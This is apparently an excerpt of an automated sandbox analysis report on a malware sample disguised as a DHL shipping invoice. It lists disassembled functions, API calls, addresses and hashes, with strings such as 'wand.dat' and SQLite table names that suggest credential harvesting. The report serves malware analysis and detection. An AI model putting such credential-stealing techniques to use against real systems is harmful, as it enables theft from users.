                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1661045500-0
                                                                                                                                                                                                                                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                      • API String ID: 1297977491-2063813899
                                                                                                                                                                                                                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                                      • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                                      • API String ID: 2618321458-1828844352
                                                                                                                                                                                                                                      • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                                                                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                                      • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1549203181-0
                                                                                                                                                                                                                                      • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                                                                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3550944819-0
                                                                                                                                                                                                                                      • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                                                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040F561
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$free
                                                                                                                                                                                                                                      • String ID: g4@
                                                                                                                                                                                                                                      • API String ID: 2888793982-2133833424
                                                                                                                                                                                                                                      • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                                                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                                                                      • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                                                                                                      • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                                                                                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1127616056-0
                                                                                                                                                                                                                                      • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                                                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: sqlite_master
                                                                                                                                                                                                                                      • API String ID: 438689982-3163232059
                                                                                                                                                                                                                                      • Opcode ID: 13525a037f87f756305c2303706c8671ba8f2adbe95e95f7a650439b65c1bb1a
                                                                                                                                                                                                                                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13525a037f87f756305c2303706c8671ba8f2adbe95e95f7a650439b65c1bb1a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3917621476-0
                                                                                                                                                                                                                                      • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                                                                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 822687973-0
                                                                                                                                                                                                                                      • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                                                                                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,757BDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,757BDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0041747F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                                                                                                      • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                                                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                                                                                                                                                      • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2678498856-0
                                                                                                                                                                                                                                      • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                                                                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                                                      APIs
